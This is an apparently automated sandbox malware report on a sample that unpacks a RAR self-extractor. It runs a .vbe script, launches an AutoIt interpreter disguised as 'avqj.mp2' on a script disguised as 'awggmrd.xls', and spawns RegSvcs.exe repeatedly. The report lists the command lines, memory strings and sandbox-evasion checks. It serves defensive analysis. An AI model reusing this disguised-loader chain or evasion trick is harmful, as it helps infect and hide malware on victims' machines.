                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (zbz(zbz.v
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hbeol.xls
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: yr5 hbeol.xlsd
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\system32\onecorecommonproxystub.dll
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\programdata\microsoft\windows\start menu
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\syswow64\onecorecommonproxystub.dll
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: windows.foundation.propertyvalue
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: yn5 it
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: windows.storage.streams.datawriterb
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: fn hbeol.xlsd
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: icusk.pdf
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: yr5 icusk.pdfd
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (zbz(zbz.i
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iomkk.dll
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: yr5 iomkk.dlld
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\c:\users\user\appdata\local\temp\rarsfx0-
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: orecommonproxystub.dll:
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\c:\users\user\appdata\local\temp\rarsfx07
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: s-1-5-21-2246122658-3693405117-2476756634-1003
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: documents
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: documentsd
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .documents
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pictures
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: picturesb
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .pictures
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shell:::{4234d49b-0245-4df3-b780-3893943456e1}
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: favorites
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: favoritesd
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .favorites
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6122658-3693405117-2476756634-1003
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &pg[c
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: )8ew`ql
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "msdw
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {"a6p
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: user-pc\usernegotiate
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: negoextenderkerberos
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tsssp
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pku2uschannel
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_koeugw_sata_cd00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\cccoma_x64fre_en-gb_dv9udf
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1dwsl
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: appdata
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: appdatat
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dwsl(z]z.
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dwsl(z]z.b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdgappdatabp1(z[z
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local<
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dwsl(z]z.v
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: n1(z`z
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: temp:
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dwsl(zcz.
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dwsl(zcz.\
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: t?temp
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\syswow64\\windows.staterepositoryps.dll
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: alfons-pc
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 192.168.2.5
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\system32\windows.staterepositoryps.dll
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pce `j&
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\syswow64\\windows.staterepositoryps.dll&
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (~/1q
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ]/qnn
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: file system bind dataht(%
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3vbe=
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft corporation4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: marshalbyvaluevalueset
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: staterepository
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: o|nt corp
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: atx@~n
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /c:\@
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: (~/14
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: psfactorybuffer}
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: psfactorybuffer
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: immersive shell*
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8wekyb3d8bbwe/
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft-edge
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: psfactorybuffero
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: user-pc\user
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: useruseruser
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bb+ncalrpc:[ole04df3000f266993954b7bac3a718]
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: nt authority\systemwdtpwdtpwdtponswdtpwdtpwdtp
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: e-0x0-3$@<
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /c:\p1
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: users
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: users<
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .users
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: alfons
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: user>memstr_9d452e20-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .usermemstr_c61703e9-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v1dwslmemstr_de76ad20-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appdata@memstr_cdb35407-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdgappdatamemstr_66c70840-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p1(z[zmemstr_b605220e-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rarsfx0memstr_f2632f98-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,\z_}_mew;ymemstr_0d53e952-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: file0memstr_1b9a2e87-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: programmemstr_33e21017-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: musicememstr_24d7b4a2-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: picturememstr_3c082fd3-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 30570memstr_7453c659-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -2163memstr_a2213c5a-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lch4'memstr_028be3eb-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rp(a4$'memstr_f51dc62f-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: saved gamesmemstr_c8fb4abd-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: saved gameshmemstr_ac04c681-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .saved gamesmemstr_b2cab35a-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s_browsememstr_1aa53a06-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}rmemstr_e28b8474-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: clsid\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}memstr_abceaa86-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.jspmemstr_3def5818-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chit8memstr_06ab7e68-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cessor_identifier=intel64 family 6 model 143 stepping 8, genuineintelprocessor_level=6processor_revision=8f08programdata=c:\programdataprogramfiles=c:\program files (x86)programfiles(x86)=c:\program files (x86)programw6432=c:\program filememstr_dc4f0b9c-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: th=c:\ogram files (xmemstr_e76718ad-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: er~ dmemstr_8c1afca1-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: program files (x86)\autoit3\automemstr_20158be2-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (onnamemstr_3a501da8-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =csofxcmmemstr_e0f1cf3e-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ers\nsmemstr_177ef2df-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: emc: 1'memstr_67ef2db1-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \a01'memstr_8873ae25-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ap@1'memstr_29ff2478-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windowsmemstr_14532c85-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: software\microsoft\windows\currentversion\internet settings\zonemap\memstr_7a38a536-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: security manager&memstr_83792594-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: start menu cachememstr_3303a86b-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt authority\systemmemstr_0f614252-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: security managermemstr_30475b62-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: parseandcreateitemmemstr_ad09f475-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &ln0hmemstr_d921c539-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: parseoriginalitemmemstr_9a28c810-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #fn08memstr_2ff10566-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\usermemstr_3481e628-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sync root managermemstr_bb8eb270-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\usermsmemstr_ac9ec41e-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\userw)memstr_088d9393-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: }d"pnmemstr_305e1cb8-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pce n'memstr_d7be9670-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mnmjgb.binmemstr_5c335d23-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yr5 mnmjgb.binfmemstr_394a390d-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (zbz(zbz.vmemstr_125907ef-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nwlmhahq.dllmemstr_9300cc40-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: yr5 nwlmhahq.dlljmemstr_05717e30-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249102724.0000000005260000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (zbz(zbz.6memstr_de501249-5
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EEBB02 SendInput,keybd_event,8_2_00EEBB02
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EEEBE5 mouse_event,8_2_00EEEBE5
Source: C:\Users\user\Desktop\u549ed5dEA.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\itdo.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c avqj.mp2 awggmrd.xls
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 avqj.mp2 awggmrd.xls
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\ruum\avqj.mp2.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\ruum\avqj.mp2.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\ruum\avqj.mp2.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\ruum\avqj.mp2.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EE13F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,8_2_00EE13F2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\avqj.mp2 | Code function: 8_2_00EE1EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,8_2_00EE1EF3
Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007082000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000000.2196870409.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp, avqj.mp2, 00000008.00000003.2219128308.0000000001218000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: avqj.mp2, 00000008.00000003.2325397298.000000000118E000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324090719.000000000117B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2, 00000008.00000003.2324361872.0000000001183000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: avqj.mp2 | Binary or memory string: Shell_TrayWnd
Source: avqj.mp2, 00000008.00000002.2326853463.0000000001100000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000003.2585498756.000000000112B000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 0000000F.00000002.2587062189.000000000112B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: avqj.mp2.exe, 00000014.00000003.3258521967.00000000019BF000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3258032251.00000000019B2000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.3257469824.00000000019A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerf/
Source: avqj.mp2.exe, 00000014.00000003.2691887562.0000000001954000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000014.00000003.2701027029.0000000001964000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" Thensv
Source: awggmrd.xls.0.dr, awggmrd.xls.8.dr | Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: avqj.mp2.exe, 00000013.00000003.2982464347.00000000019EB000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3128902063.0000000001A02000.00000004.00000020.00020000.00000000.sdmp, avqj.mp2.exe, 00000013.00000003.3112151550.00000000019FF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managery

                Language, Device and Operating System Detection

Source: Yara match | File source: Process Memory Space: avqj.mp2 PID: 2828, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: avqj.mp2.exe PID: 6848, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: avqj.mp2.exe PID: 4676, type: MEMORYSTR
Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CB6694 cpuid 0_2_00CB6694
Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00CAFD34
Source: C:\Users\user\Desktop\u549ed5dEA.exe | Code function: 0_2_00CB454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00CB454A
